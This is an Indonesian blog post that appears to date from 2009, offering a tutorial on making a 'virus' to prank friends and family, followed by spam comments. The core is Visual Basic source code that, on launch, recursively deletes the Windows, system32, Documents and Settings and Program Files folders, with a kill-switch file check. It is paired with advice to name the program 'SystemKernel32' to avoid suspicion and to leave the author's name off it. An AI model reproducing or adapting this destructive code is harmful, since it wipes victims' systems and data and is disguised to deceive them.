tips bikin virus ganas buat ngerjain temen lo, tante lo, nenek,kakek dan semua orang

23 01 2009

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

write by ginbol


Aksi

Information

7 responses

28 01 2009
ubay rock n roll

keren … banget artikel ini

1 08 2012
wafiq

bisa lebih simpel gk gw gk ngerti VB

30 01 2013
click here

WOW just what I was searching for. Came here by searching for what is a sure way to get pregnant

9 04 2013
http://1.bizness.keed.pl/

ło o owe, aby przynęta http://1.bizness.keed.
pl/ poruszała się jakkolwiek
nieznacznie. Smoki poprzednio od czasu wyprzedziła przestały się
robić w balona na nieruchome kukły. Niewiedza tego argumentu kosztowała
wcześniej żywot
mnóstwa szewczyków, straszydło,

9 05 2013
pitching golf

Hi there, I read your blog from time to time and I own a similar one and I was just wondering if you get a lot of spam responses?

If so how do you reduce it, any plugin or anything you can
advise? I get so much lately it’s driving me crazy so any assistance is very much appreciated.

13 05 2013
Link

Hey,
I just noticed your webpage: tips bikin virus ganas buat ngerjain temen lo, tante lo, nenek,kakek dan semua
orang | ubay stenlly when I was surfing around delicious.
com. It looks as though someone enjoyed your blog so much they
decided to bookmark it – good job!

20 12 2014
toko sepatu online original murah

What’s up to every one, the contents existing
at this site are really remarkable for people experience, well, keep up the nice work fellows.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s




%d blogger menyukai ini: